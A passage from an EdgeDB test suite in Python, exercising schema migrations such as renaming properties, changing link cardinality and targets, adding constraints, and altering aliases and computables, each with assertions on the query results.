'__type__': {'name': 'test::Derived'},
'foo2': 'derived_02',
}],
)
async def test_edgeql_migration_eq_03(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_03',
};
INSERT Derived {
foo := 'derived_03',
};
""")
await self.migrate(r"""
type Base;
# drop 'foo'
type Derived extending Base {
# completely different property
property foo2 -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
[IS Derived].foo2,
} ORDER BY .foo2;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': None,
}, {
'__type__': {'name': 'test::Derived'},
'foo2': None,
}],
)
async def test_edgeql_migration_eq_04(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
type Derived extending Base;
type Further extending Derived {
overloaded required property foo -> str;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 'base_04',
};
INSERT Derived {
foo := 'derived_04',
};
INSERT Further {
foo := 'further_04',
};
""")
await self.migrate(r"""
type Base;
# drop 'foo'
type Derived extending Base;
type Further extending Derived {
# completely different property
property foo2 -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
[IS Further].foo2,
} ORDER BY .__type__.name;
""",
[{
'__type__': {'name': 'test::Base'},
'foo2': None,
}, {
'__type__': {'name': 'test::Derived'},
'foo2': None,
}, {
'__type__': {'name': 'test::Further'},
'foo2': None,
}],
)
async def test_edgeql_migration_eq_06(self):
await self.migrate(r"""
type Base {
property foo -> int64;
}
type Derived extending Base {
overloaded required property foo -> int64;
}
""")
await self.con.execute("""
SET MODULE test;
INSERT Base {
foo := 6,
};
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo,
};
""",
[{
'__type__': {'name': 'test::Base'},
# the value was correctly inserted
'foo': 6,
}],
)
await self.migrate(r"""
type Base {
property foo -> float64;
}
type Derived extending Base {
overloaded required property foo -> float64;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
__type__: {name},
foo,
};
""",
[{
'__type__': {'name': 'test::Base'},
'foo': 6.0,
}],
)
async def test_edgeql_migration_eq_07(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Child {
required property name -> str {
constraint exclusive;
}
}
type Base {
required property name -> str;
link bar -> Child;
}
""")
await self.con.execute('''
INSERT Child { name := 'c1' };
INSERT Child { name := 'c2' };
INSERT Base {
name := 'b1',
bar := (SELECT Child FILTER .name = 'c1'),
};
INSERT Base {
name := 'b2',
};
''')
await self.assert_query_result(
r"""
SELECT Base {
bar: {
name
}
} ORDER BY .name;
""",
[{
'bar': {
'name': 'c1',
},
}, {
'bar': None,
}],
)
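        # The user_input below answers the populate prompt for the newly
        # required exclusive link, assigning 'c2' to the Base without a bar.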
await self.migrate(r"""
type Child {
required property name -> str {
constraint exclusive;
}
}
type Base {
required property name -> str;
required link bar -> Child {
# add a constraint
constraint exclusive;
}
}
""", user_input=[
"SELECT Child FILTER .name = 'c2'"
])
await self.assert_query_result(
r"""
SELECT Base {
bar: {
name
}
} ORDER BY .name;
""",
[{
'bar': {
'name': 'c1',
},
}, {
'bar': {
'name': 'c2',
},
}],
)
async def test_edgeql_migration_eq_08(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'very_long_test_str_base_08',
};
""")
# Try altering the schema to a state inconsistent with current
# data.
new_state = r"""
type Base {
property foo -> str {
# add a constraint
constraint max_len_value(10);
}
}
"""
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r"foo must be no longer than 10 characters"):
await self.migrate(new_state)
# Fix the data.
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_08',
};
""")
        # Migrate to the same state as before now that the data is fixed.
await self.migrate(new_state)
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': 'base_08',
}],
)
async def test_edgeql_migration_eq_09(self):
await self.migrate(r"""
scalar type constraint_length extending str {
constraint max_len_value(10);
}
type Base {
property foo -> constraint_length;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'b09',
};
""")
# Try altering the schema to a state inconsistent with current
# data.
new_state = r"""
scalar type constraint_length extending str {
constraint max_len_value(10);
# add a constraint
constraint min_len_value(5);
}
type Base {
property foo -> constraint_length;
}
"""
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r'Existing test::Base\.foo values violate the new constraint'):
await self.migrate(new_state)
# Fix the data.
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_09',
};
""")
        # Migrate to the same state as before now that the data is fixed.
await self.migrate(new_state)
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': 'base_09',
}],
)
async def test_edgeql_migration_eq_11(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_11',
};
""")
await self.migrate(r"""
type Child;
type Base {
                # change the property to a link with the same name
link foo -> Child {
# add a constraint
constraint exclusive;
}
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': None,
}],
)
async def test_edgeql_migration_eq_12(self):
await self.migrate(r"""
type Child;
type Base {
property foo -> str {
constraint exclusive;
}
link bar -> Child {
constraint exclusive;
}
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
foo := 'base_12',
bar := (INSERT Child)
})
{
foo,
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base {
# drop constraints
property foo -> str;
link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar: {id}
};
""",
[{
'foo': 'base_12',
'bar': {'id': data[0].bar.id}
}],
)
async def test_edgeql_migration_eq_13(self):
await self.migrate(r"""
type Child;
type Base {
link bar -> Child;
}
type Derived extending Base {
overloaded required link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Derived {
bar := (INSERT Child)
})
{
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base;
# drop 'bar'
type Derived extending Base {
# no longer inherit link 'bar'
link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Derived {
bar: {id}
};
""",
[{
'bar': {'id': data[0].bar.id}
}],
)
async def test_edgeql_migration_eq_14a(self):
await self.migrate(r"""
type Base;
type Derived extending Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {
foo := 'derived_14',
};
""")
await self.migrate(r"""
type Base {
# move the property earlier in the inheritance
property foo -> str;
}
type Derived extending Base {
overloaded property foo -> str {
annotation title := 'overloaded'
}
}
""")
await self.assert_query_result(
r"""
SELECT Derived {
foo,
};
""",
[{
'foo': 'derived_14',
}],
)
async def test_edgeql_migration_eq_14b(self):
        # Same as above, except use POPULATE MIGRATION and inspect the
        # generated DDL
await self.migrate(r"""
type Base;
type Derived extending Base {
property foo -> str;
}
""")
await self.start_migration(r"""
type Base {
# move the property earlier in the inheritance
property foo -> str;
}
type Derived extending Base {
overloaded required property foo -> str;
}
""", populate=True)
await self.assert_describe_migration({
'confirmed': ["""
ALTER TYPE test::Base {
CREATE PROPERTY foo -> std::str;
};
""", """
ALTER TYPE test::Derived {
ALTER PROPERTY foo {
SET REQUIRED;
};
};
"""],
'complete': True,
})
async def test_edgeql_migration_eq_16(self):
await self.migrate(r"""
type Child;
type Base;
type Derived extending Base {
link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Derived {
bar := (INSERT Child),
}
) {
bar: {id}
};
""")
await self.migrate(r"""
type Child;
type Base {
# move the link earlier in the inheritance
link bar -> Child;
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Derived {
bar,
};
""",
[{
'bar': {'id': data[0].bar.id},
}],
)
await self.migrate(
r"""
type Child;
type Base {
link bar -> Child;
}
type Derived extending Base {
# also make the link 'required'
overloaded required link bar -> Child;
}
""",
user_input=[
'.bar',
],
)
await self.assert_query_result(
r"""
SELECT Derived {
bar,
};
""",
[{
'bar': {'id': data[0].bar.id},
}],
)
async def test_edgeql_migration_eq_18(self):
await self.migrate(r"""
type Base {
property name := 'computable'
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
                # change a property from a computable to a regular one
                # with a default
property name -> str {
default := 'something'
}
}
""")
        # Insert a new object; this one should get the new default name.
await self.con.execute(r"""
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
name,
} ORDER BY .name EMPTY LAST;
""",
[{
'name': 'something',
}, {
'name': 'something',
}],
)
async def test_edgeql_migration_eq_19(self):
await self.migrate(r"""
type Base {
property name -> str
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
name := 'base_19'
};
""")
await self.migrate(r"""
type Base {
# change a regular property to a computable
property name := 'computable'
}
""")
await self.assert_query_result(
r"""
SELECT Base {
name,
};
""",
[{
'name': 'computable',
}],
)
async def test_edgeql_migration_eq_21(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_21'
};
""")
await self.migrate(r"""
type Base {
property foo -> str;
# add a property
property bar -> int64;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
bar := 21
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar
};
""",
[{
'foo': 'base_21',
'bar': 21,
}],
)
await self.migrate(r"""
type Base {
# make the old property into a computable
property foo := <str>__source__.bar;
property bar -> int64;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
bar
};
""",
[{
'foo': '21',
'bar': 21,
}],
)
async def test_edgeql_migration_eq_22(self):
await self.migrate(r"""
type Base {
property foo -> str;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 'base_22'
};
""")
await self.migrate(r"""
# rename the type, although this test doesn't ensure that
# renaming actually took place
type NewBase {
property foo -> str;
}
""")
await self.assert_query_result(
r"""
SELECT NewBase {
foo,
};
""",
[{
'foo': 'base_22',
}],
)
await self.migrate(r"""
type NewBase {
property foo -> str;
# add a property
property bar -> int64;
}
""")
await self.con.execute(r"""
UPDATE NewBase
SET {
bar := 22
};
""")
await self.assert_query_result(
r"""
SELECT NewBase {
foo,
bar
};
""",
[{
'foo': 'base_22',
'bar': 22,
}],
)
await self.migrate(r"""
type NewBase {
# drop 'foo'
property bar -> int64;
}
            # add an alias to emulate the original
alias Base := (
SELECT NewBase {
foo := <str>.bar
}
);
""")
await self.assert_query_result(
r"""
SELECT Base {
foo,
};
""",
[{
'foo': '22',
}],
)
@test.xfail('''
edgedb.errors.SchemaError: ObjectType 'test::Base' is already
present in the schema <Schema gen:3757 at 0x7fc3319fa820>
Exception: Error while processing
'CREATE ALIAS test::Base := (
SELECT
test::Child {
bar := test::Child
}
);'
''')
async def test_edgeql_migration_eq_23(self):
await self.migrate(r"""
type Child {
property foo -> str;
}
type Base {
link bar -> Child;
}
alias Alias01 := (
SELECT Base {
child_foo := .bar.foo
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
bar := (
INSERT Child {
foo := 'child_23'
}
)
};
""")
await self.migrate(r"""
type Child {
property foo -> str;
}
            # exchange a type for an alias
alias Base := (
SELECT Child {
# bar is the same as the root object
bar := Child
}
);
alias Alias01 := (
# now this alias refers to another alias
SELECT Base {
child_foo := .bar.foo
}
);
""")
await self.assert_query_result(
r"""
SELECT Alias01 {
child_foo,
};
""",
[{
'child_foo': 'child_23',
}],
)
async def test_edgeql_migration_eq_24(self):
await self.migrate(r"""
type Child;
type Base {
link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
bar := (INSERT Child)
}
) {
bar: {id}
}
""")
await self.migrate(r"""
type Child;
type Base {
# increase link cardinality
multi link bar -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': [{'id': data[0].bar.id}],
}],
)
async def test_edgeql_migration_eq_25(self):
await self.migrate(r"""
type Child;
type Base {
multi link bar -> Child;
}
""")
await self.con.execute("""
SET MODULE test;
""")
data = await self.con.query(r"""
SELECT (
INSERT Base {
bar := (INSERT Child)
}
) {
bar: {id}
}
""")
await self.migrate(r"""
type Child;
type Base {
# reduce link cardinality
link bar -> Child;
}
""", user_input=[
'(SELECT .bar LIMIT 1)'
])
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': {'id': data[0].bar[0].id},
}],
)
await self.migrate(r"""
type Child;
type Base {
link bar -> Child {
# further restrict the link
constraint exclusive
}
}
""")
await self.assert_query_result(
r"""
SELECT Base {
bar: {id},
};
""",
[{
'bar': {'id': data[0].bar[0].id},
}],
)
async def test_edgeql_migration_eq_26(self):
await self.migrate(r"""
type Child;
type Parent {
link bar -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Parent {
bar := (INSERT Child)
};
""")
await self.migrate(r"""
type Child;
type Parent {
link bar -> Child;
}
# derive a type
type DerivedParent extending Parent;
""")
await self.assert_query_result(
r"""
SELECT Parent {
type := .__type__.name,
bar_type := .bar.__type__.name
};
""",
[{
'type': 'test::Parent',
'bar_type': 'test::Child',
}],
)
await self.migrate(
r"""
type Child;
type DerivedChild extending Child;
type Parent {
link bar -> Child;
}
type DerivedParent extending Parent;
""",
)
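        # Overloading the link with a narrower target prompts for a
        # conversion expression, supplied via user_input below.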
await self.migrate(
r"""
type Child;
type DerivedChild extending Child;
type Parent {
link bar -> Child;
}
# derive a type with a more restrictive link
type DerivedParent extending Parent {
overloaded link bar -> DerivedChild;
}
""",
user_input=[".bar[IS DerivedChild]"],
)
await self.con.execute(r"""
INSERT DerivedParent {
bar := (INSERT DerivedChild)
}
""")
await self.assert_query_result(
r"""
SELECT Parent {
type := .__type__.name,
bar_type := .bar.__type__.name
} ORDER BY .bar_type;
""",
[{
'type': 'test::Parent',
'bar_type': 'test::Child',
}, {
'type': 'test::DerivedParent',
'bar_type': 'test::DerivedChild',
}],
)
async def test_edgeql_migration_eq_27(self):
await self.migrate(r"""
abstract type Named {
property name -> str;
}
type Foo extending Named;
type Bar extending Named;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Foo {
name := 'foo_27',
};
INSERT Bar {
name := 'bar_27',
};
""")
await self.migrate(r"""
abstract type Named {
property name -> str;
}
            # the types stop extending Named, but retain the property
            # 'name'
type Foo {
property name -> str;
};
type Bar {
property name -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_27',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_27',
],
)
await self.migrate(r"""
abstract type Named {
property name -> str;
}
type Foo {
property name -> str;
};
type Bar {
# rename 'name' to 'title'
property title -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_27',
],
)
await self.assert_query_result(
r"""
SELECT Bar.title;
""",
[
'bar_27',
],
)
async def test_edgeql_migration_eq_29(self):
await self.migrate(r"""
type Child {
property foo -> str;
}
alias Base := (
SELECT Child {
bar := .foo
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
foo := 'child_29',
};
""")
await self.migrate(r"""
# drop everything
""")
async def test_edgeql_migration_eq_30(self):
await self.migrate(r"""
type Foo {
property name -> str;
};
type Bar {
property title -> str;
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Foo {
name := 'foo_30',
};
INSERT Bar {
title := 'bar_30',
};
""")
await self.migrate(r"""
type Foo {
property name -> str;
};
type Bar {
# rename 'title' to 'name'
property name -> str;
};
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_30',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_30',
],
)
await self.migrate(r"""
# both types have a name, so the name prop is factored out
# into a more basic type.
abstract type Named {
property name -> str;
}
type Foo extending Named;
type Bar extending Named;
""")
await self.assert_query_result(
r"""
SELECT Foo.name;
""",
[
'foo_30',
],
)
await self.assert_query_result(
r"""
SELECT Bar.name;
""",
[
'bar_30',
],
)
async def test_edgeql_migration_eq_31(self):
# Issue 727.
#
        # Starting with the sample schema (from the frontpage), migrate to
        # a schema with only the type User.
await self.migrate(r"""
# This is an abstract object containing
# text.
abstract type Text {
required property body -> str {
# Maximum length of text is 10000
# characters.
constraint max_len_value(10000);
}
}
type User {
required property name -> str;
}
abstract type Owned {
# By default links are optional.
required link owner -> User;
}
            # UniquelyNamed is an abstract type that
# enforces name uniqueness across all
# instances of its subtype.
abstract type UniquelyNamed {
required property name -> str {
delegated constraint exclusive;
}
}
type Status extending UniquelyNamed;
type Priority extending UniquelyNamed;
# LogEntry is an Owned and a Text,
# so it will have all of their links
# and properties, in particular, the
# "owner" link and the "body" property.
type LogEntry extending Owned, Text {
required property spent_time -> int64;
}
type Comment extending Text, Owned {
required link issue -> Issue;
link parent -> Comment;
}
# issue_num_t is defined as a concrete
# sequence type, used to generate
# sequential issue numbers.
scalar type issue_num_t extending sequence;
type Issue extending Owned, Text {
required property title -> str;
required property number -> issue_num_t {
# The number values are automatically
# generated, and are not supposed to be
# directly writable.
readonly := true;
}
property time_estimate -> int64;
property start_date -> datetime {
                    # The default value of start_date will be the
                    # result of the EdgeQL expression below.
default := (SELECT datetime_current());
}
property due_date -> datetime;
required link status -> Status;
link priority -> Priority;
# The watchers link is mapped to User
# type in many-to-many relation.
multi link watchers -> User;
multi link time_spent_log -> LogEntry {
# Exclusive multi-link represents
# a one-to-many relation.
constraint exclusive;
}
multi link related_to -> Issue;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Status {
name := 'Open'
};
INSERT Status {
name := 'Closed'
};
INSERT User {
name := 'cosmophile'
};
""")
await self.migrate(r"""
type User {
required property name -> str;
}
""")
# there's only the User left
await self.assert_query_result(
r"""
SELECT User.name;
""",
[
'cosmophile',
],
)
async def test_edgeql_migration_eq_32(self):
# Issue 727.
#
# Starting with a small schema, migrate to remove its elements.
# A fresh blank database already contains some Objects because
# of the placeholder objects used for GraphQL.
start_objects = await self.con.query_single(r"""
SELECT count(Object);
""")
await self.migrate(r"""
type LogEntry {
required property spent_time -> int64;
}
type Issue {
multi link time_spent_log -> LogEntry {
constraint exclusive;
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT LogEntry {
spent_time := 100
};
INSERT Issue {
time_spent_log := LogEntry
};
""")
await self.migrate(r"""
type LogEntry {
required property spent_time -> int64;
}
""")
# there's only the LogEntry left
await self.assert_query_result(
r"""
SELECT LogEntry.spent_time;
""",
[
100,
],
)
await self.assert_query_result(
r"""
SELECT count(Object);
""",
[
start_objects + 1,
],
)
await self.migrate(r"""
# empty schema
""")
# no more additional objects
await self.assert_query_result(
r"""
SELECT count(Object);
""",
[
start_objects,
],
)
async def test_edgeql_migration_eq_33(self):
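# Change a link's target type; the migration needs a
# user-supplied conversion expression for the existing data.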
await self.migrate(r"""
type Child;
type Base {
link foo -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child;
INSERT Base {
foo := (SELECT Child LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child'},
}
}],
)
await self.migrate(
r"""
type Child;
type Child2;
type Base {
link foo -> Child;
}
""",
)
await self.migrate(
r"""
type Child;
type Child2;
type Base {
# change link type
link foo -> Child2;
}
""",
user_input=[
'.foo[IS Child2]'
],
)
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
# the link is empty because the target was changed
'foo': None
}],
)
await self.con.execute(r"""
INSERT Child2;
UPDATE Base
SET {
foo := (SELECT Child2 LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child2'},
}
}],
)
async def test_edgeql_migration_eq_34(self):
# this is the reverse of test_edgeql_migration_eq_11
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
constraint exclusive;
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child;
INSERT Base {
foo := (SELECT Child LIMIT 1)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
__type__: {name},
}
};
""",
[{
'foo': {
'__type__': {'name': 'test::Child'},
}
}],
)
await self.migrate(r"""
type Base {
# change the link to a property with the same name
property foo -> str;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo
};
""",
[{
# the property is empty now
'foo': None
}],
)
await self.con.execute(r"""
UPDATE Base
SET {
foo := 'base_foo_34'
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo
};
""",
[{
'foo': 'base_foo_34'
}],
)
async def test_edgeql_migration_eq_35(self):
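# Change a computable multi link into a regular link of the
# same name; the previously computed data is not carried over.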
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
multi link foo := (
SELECT Child FILTER .name = 'computable_35'
)
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
name := 'computable_35'
};
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': [{
'name': 'computable_35',
}]
}]
)
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
# change a link from a computable to a regular one
multi link foo -> Child;
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': []
}]
)
# Make sure that the new 'foo' can be updated.
await self.con.execute(r"""
INSERT Child {
name := 'child_35'
};
UPDATE Base
SET {
foo := (
SELECT Child FILTER .name = 'child_35'
)
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': [{
'name': 'child_35'
}]
}]
)
async def test_edgeql_migration_eq_36(self):
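# The reverse of eq_35: change a regular link into a computable.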
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
multi link foo -> Child;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Child {
name := 'computable_36'
};
INSERT Child {
name := 'child_36'
};
INSERT Base {
foo := (
SELECT Child FILTER .name = 'child_36'
)
};
""")
await self.migrate(r"""
type Child {
required property name -> str;
}
type Base {
# change a regular link to a computable
link foo := (
SELECT Child FILTER .name = 'computable_36'
LIMIT 1
)
}
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: {
name
},
};
""",
[{
'foo': {
'name': 'computable_36'
}
}]
)
async def test_edgeql_migration_eq_37(self):
# testing schema alias
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
foo := 'base_alias_37'
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 'base_alias_37'
}]
)
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
# "rename" a computable, since the value is given and
# not stored, this is no different from dropping
# original and creating a new property
foo2 := 'base_alias_37'
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo2
};
""",
[{
'foo2': 'base_alias_37'
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"object type 'test::Base' has no link or property 'foo'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo
};
""")
async def test_edgeql_migration_eq_38(self):
# testing schema alias
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
foo := 'base_alias_38'
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 'base_alias_38'
}]
)
await self.migrate(r"""
type Base;
alias BaseAlias := (
SELECT Base {
# keep the name, but change the type
foo := 38
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo
};
""",
[{
'foo': 38
}]
)
async def test_edgeql_migration_eq_39(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (SELECT Foo FILTER .name = 'base_alias_39')
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_39'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'base_alias_39'
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
# "rename" a computable, since the value is given and
# not stored, this is no different from dropping
# original and creating a new multi-link
foo2 := (SELECT Foo FILTER .name = 'base_alias_39')
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo2: {
name
}
};
""",
[{
'foo2': [{
'name': 'base_alias_39'
}]
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"object type 'test::Base' has no link or property 'foo'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo: {
name
}
};
""")
async def test_edgeql_migration_eq_40(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
type Bar {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (SELECT Foo FILTER .name = 'foo_40')
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'foo_40'};
INSERT Bar {name := 'bar_40'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'foo_40'
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
type Bar {
property name -> str
}
alias BaseAlias := (
SELECT Base {
# keep the name, but change the type
foo := (SELECT Bar FILTER .name = 'bar_40')
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name
}
};
""",
[{
'foo': [{
'name': 'bar_40'
}]
}]
)
async def test_edgeql_migration_eq_41(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
@bar := 'foo_bar_alias_41'
}
FILTER .name = 'base_alias_41'
)
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_41'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_41',
'@bar': 'foo_bar_alias_41',
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
# "rename" a computable link property, since
# the value is given and not stored, this is
# no different from dropping original and
# creating a new multi-link
@baz := 'foo_bar_alias_41'
}
FILTER .name = 'base_alias_41'
)
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@baz
}
};
""",
[{
'foo': [{
'name': 'base_alias_41',
'@baz': 'foo_bar_alias_41'
}]
}]
)
with self.assertRaisesRegex(
edgedb.InvalidReferenceError,
r"link 'foo' .* has no property 'bar'"):
await self.con.execute(r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""")
async def test_edgeql_migration_eq_42(self):
# testing schema alias
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
@bar := 'foo_bar_alias_42'
}
FILTER .name = 'base_alias_42'
)
}
)
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
INSERT Foo {name := 'base_alias_42'};
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_42',
'@bar': 'foo_bar_alias_42',
}]
}]
)
await self.migrate(r"""
type Base;
type Foo {
property name -> str
}
alias BaseAlias := (
SELECT Base {
foo := (
SELECT Foo {
# keep the name, but change the type
@bar := 42
}
FILTER .name = 'base_alias_42'
)
}
)
""")
await self.assert_query_result(
r"""
SELECT BaseAlias {
foo: {
name,
@bar
}
};
""",
[{
'foo': [{
'name': 'base_alias_42',
'@bar': 42,
}]
}]
)
async def test_edgeql_migration_eq_43(self):
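# A multi link extending an abstract link with a property,
# followed by dropping the whole schema.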
await self.migrate(r"""
abstract link Ordered {
property index -> int32;
}
type User;
abstract type Permissions {
multi link owners extending Ordered -> User;
};
""")
await self.migrate(r"")
async def test_edgeql_migration_index_01(self):
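# Add a second index to a type that already has one.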
await self.migrate('''
type Message {
required property text -> str;
index on (.text);
};
''')
await self.migrate('''
type Message {
required property text -> str;
property ts -> datetime;
index on (.text);
index on (.ts);
};
''')
await self.assert_query_result(
r"""
SELECT count((SELECT schema::ObjectType
FILTER .name = 'test::Message').indexes)
""",
[2],
)
async def test_edgeql_migration_rebase_01(self):
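# Add another base type (P) to an existing type's bases.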
await self.migrate(r"""
abstract type C;
abstract type P {
property p -> str;
property p2 -> str;
index on (.p);
};
type Foo extending C {
property foo -> str;
}
""")
await self.migrate(r"""
abstract type C;
abstract type P {
property p -> str;
property p2 -> str;
index on (.p);
};
type Foo extending C, P {
property foo -> str;
}
""")
async def test_edgeql_migration_rebase_02(self):
await self.migrate('''
type User;
abstract type Event {
required property createdAt -> datetime {
default := datetime_current();
}
required link user -> User;
}
type Post extending Event {
required property content -> str {
constraint min_len_value(1);
constraint max_len_value(280);
}
}
''')
await self.start_migration('''
type User;
abstract type Event {
required property createdAt -> datetime {
default := datetime_current();
}
required link user -> User;
}
abstract type HasContent {
required property content -> str {
constraint min_len_value(1);
constraint max_len_value(280);
}
}
type Post extending Event, HasContent {
}
type Reply extending Event, HasContent {
required link post -> Post;
}
''')
# N.B.: these prompts are OK but not canonical; if they are
# broken in favor of something better, just fix them.
await self.interact([
"did you create object type 'test::HasContent'?",
"did you alter object type 'test::Post'?",
